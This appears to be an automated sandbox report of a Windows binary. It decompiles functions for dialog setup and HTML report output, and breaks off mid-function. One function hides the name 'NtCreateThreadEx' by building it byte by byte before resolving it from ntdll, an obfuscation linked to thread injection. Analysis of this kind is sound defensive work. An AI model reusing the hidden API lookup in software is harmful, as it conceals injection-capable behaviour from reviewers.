Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}

0x0040a1f8
0x0040a26d
0x00000000
0x0040a26f
0x0040a205
0x0040a20b
0x0040a20d
0x0040a213
0x0040a214
0x0040a215
0x0040a216
0x0040a217
0x0040a219
0x0040a21f
0x0040a223
0x0040a227
0x0040a22b
0x0040a22f
0x0040a233
0x0040a237
0x0040a23b
0x0040a23f
0x0040a243
0x0040a247
0x0040a24b
0x0040a24f
0x0040a253
0x0040a257
0x0040a25b
0x0040a25f
0x0040a269
0x00000000
0x0040a26c
0x0040a271

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

e, xrefs: 0040A233
t, xrefs: 0040A223
C, xrefs: 0040A237
t, xrefs: 0040A22F
r, xrefs: 0040A23B
r, xrefs: 0040A243
h, xrefs: 0040A25B
e, xrefs: 0040A24F
a, xrefs: 0040A253
ntdll.dll, xrefs: 0040A1FA
x, xrefs: 0040A24B
N, xrefs: 0040A21F
a, xrefs: 0040A22B
d, xrefs: 0040A23F
T, xrefs: 0040A257
e, xrefs: 0040A227
E, xrefs: 0040A247

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
API String ID: 2574300362-1257427173
Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776

Uniqueness

Uniqueness Score: -1.00%

Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}

0x00407f9b
0x00407fa3
0x00407fad
0x00407fb9
0x0040802e
0x00408032
0x00408038
0x0040803e
0x00407fbb
0x00407fc9
0x00407fd0
0x00407fe0
0x00407fe5
0x00407ff7
0x00408015
0x0040801b
0x00408021
0x00408021
0x00408051
0x00408051
0x00408059
0x00408065
0x00408069
0x0040806f
0x00408087
0x00408087
0x0040809c
0x004080bb
0x004080d1
0x004080de
0x004080e2
0x004080ea
0x004080fb
0x00408105
0x00408115
0x00408121
0x00408127
0x00408150

APIs

memset.MSVCRT ref: 00407FD0
memset.MSVCRT ref: 00407FE5
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
LoadImageW.USER32 ref: 004080B4
GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
LoadImageW.USER32 ref: 004080D1
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
GetSysColor.USER32(0000000F), ref: 004080EA
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
DeleteObject.GDI32(?), ref: 00408121
DeleteObject.GDI32(?), ref: 00408127
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

0x0040ae90
0x0040aeab
0x0040aeb2
0x0040aec0
0x0040aec7
0x0040aecc
0x0040aed3
0x0040aeda
0x0040aee1
0x0040aee1
0x0040aee7
0x0040aeea
0x0040aeed
0x0040aef9
0x0040aefe
0x0040af05
0x0040af07
0x0040af08
0x0040af13
0x0040af18
0x0040af19
0x0040af26
0x0040af2b
0x0040af2b
0x0040af2e
0x0040af34
0x0040af43
0x0040af44
0x0040af4f
0x0040af54
0x0040af55
0x0040af62
0x0040af67
0x0040af70
0x0040af76
0x0040af7a
0x0040af82
0x0040af88
0x0040af8d
0x0040af97
0x0040af9f
0x0040afa5
0x0040afa9
0x0040afb1
0x0040afb7
0x0040afbd

APIs

memset.MSVCRT ref: 0040AEB2
memset.MSVCRT ref: 0040AEC7
wcscpy.MSVCRT ref: 0040AEF9
_snwprintf.MSVCRT ref: 0040AF19
wcscat.MSVCRT ref: 0040AF26
_snwprintf.MSVCRT ref: 0040AF55
wcscat.MSVCRT ref: 0040AF62
wcscat.MSVCRT ref: 0040AF70
wcscat.MSVCRT ref: 0040AF82
wcscat.MSVCRT ref: 0040AF8D
wcscat.MSVCRT ref: 0040AF9F
wcscat.MSVCRT ref: 0040AFB1

Strings

<font, xrefs: 0040AEF3
size="%d", xrefs: 0040AF08
<b>, xrefs: 0040AF7C
</font>, xrefs: 0040AFAB
color="#%s", xrefs: 0040AF44
</b>, xrefs: 0040AF99

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}

0x00403c09
0x00403c0c
0x00403c11
0x00403c1b
0x00403c3f
0x00403c4a
0x00403c6e
0x00403c96
0x00403c9a
0x00403ca6
0x00403cb3
0x00403cb8
0x00403cc5
0x00403cca
0x00403cdd
0x00403ce6
0x00403cf8
0x00403d11
0x00403d26
0x00403d3f
0x00403d54
0x00403d6d
0x00403d76
0x00403d88
0x00403d9e
0x00403db0
0x00403db5
0x00403dc4
0x00403dc8
0x00403dc9
0x00403dca
0x00403dda
0x00403ddf
0x00403de2
0x00403de3
0x00403df4
0x00403df8
0x00403df9
0x00403dfa
0x00403e0a
0x00403e0f
0x00403e12
0x00403e13
0x00403e22
0x00403e26
0x00403e28
0x00403e29
0x00403e39
0x00403e3e
0x00403e41
0x00403e42
0x00403e51
0x00403e55
0x00403e57
0x00403e58
0x00403e68
0x00403e6d
0x00403e70
0x00403e71
0x00403e71
0x00403e87
0x00403e8d
0x00403e9e
0x00403ea6
0x00403eaf
0x00403ebc

APIs

Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34

DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
GetDlgItem.USER32 ref: 00403C2F
SetWindowLongW.USER32 ref: 00403C39

Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16

GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
LoadImageW.USER32 ref: 00403C6A
GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
LoadImageW.USER32 ref: 00403C7F
SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
GetDlgItem.USER32 ref: 00403CB0

Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

GetDlgItem.USER32 ref: 00403CC2
GetDlgItem.USER32 ref: 00403CD4

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

GetDlgItem.USER32 ref: 00403D64
GetDlgItem.USER32 ref: 00403DC0
GetDlgItem.USER32 ref: 00403DF0
GetDlgItem.USER32 ref: 00403E20
GetDlgItem.USER32 ref: 00403E4F
SendDlgItemMessageW.USER32 ref: 00403E87
GetDlgItem.USER32 ref: 00403E9B
SetFocus.USER32(00000000), ref: 00403E9E

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
String ID:
API String ID: 1038210931-0
Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}

0x00407763
0x0040776c
0x00407784
0x0040778b
0x00407797
0x00407799
0x0040779b
0x004077a7
0x004077ae
0x004077bd
0x004077c4
0x004077d3
0x004077da
0x004077e1
0x004077e6
0x004077f2
0x004077f5
0x00407804
0x00407805
0x00407810
0x00407812
0x00407813
0x00407818
0x00407818
0x00407825
0x0040782d
0x00407830
0x0040783a
0x00407840
0x00407846
0x00407849
0x00407850
0x0040785e
0x00407864
0x00407867
0x0040786b
0x0040786f
0x00407877
0x0040787a
0x00407885
0x00407892
0x004078a8
0x004078b8
0x004078c5
0x004078ff
0x004078c7
0x004078ca
0x004078dd
0x004078de
0x004078e3
0x004078e8
0x004078eb
0x004078f0
0x004078f0
0x00407906
0x00407909
0x0040790f
0x0040791d
0x00407923
0x0040792d
0x00407932
0x0040793b
0x00407942
0x00407943
0x0040794c
0x00407953
0x00407954
0x00407959
0x0040795c
0x00407961
0x0040796c
0x00407971
0x0040797a
0x00000000
0x00000000
0x00407838
0x00407838
0x0040783a
0x00407980
0x0040798a
0x004079a1

APIs

memset.MSVCRT ref: 00407784
memset.MSVCRT ref: 004077AE
memset.MSVCRT ref: 004077C4
memset.MSVCRT ref: 004077DA
_snwprintf.MSVCRT ref: 00407813
wcscpy.MSVCRT ref: 0040785E
_snwprintf.MSVCRT ref: 004078EB
wcscat.MSVCRT ref: 0040791D

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

wcscpy.MSVCRT ref: 004078FF
_snwprintf.MSVCRT ref: 0040795C

Strings

 , xrefs: 00407917
</table><p>, xrefs: 00407980
<table border="1" cellpadding="5">, xrefs: 0040781B
nowrap, xrefs: 00407858
bgcolor="%s", xrefs: 00407805
<font color="%s">%s</font>, xrefs: 004078DE
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040778C

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
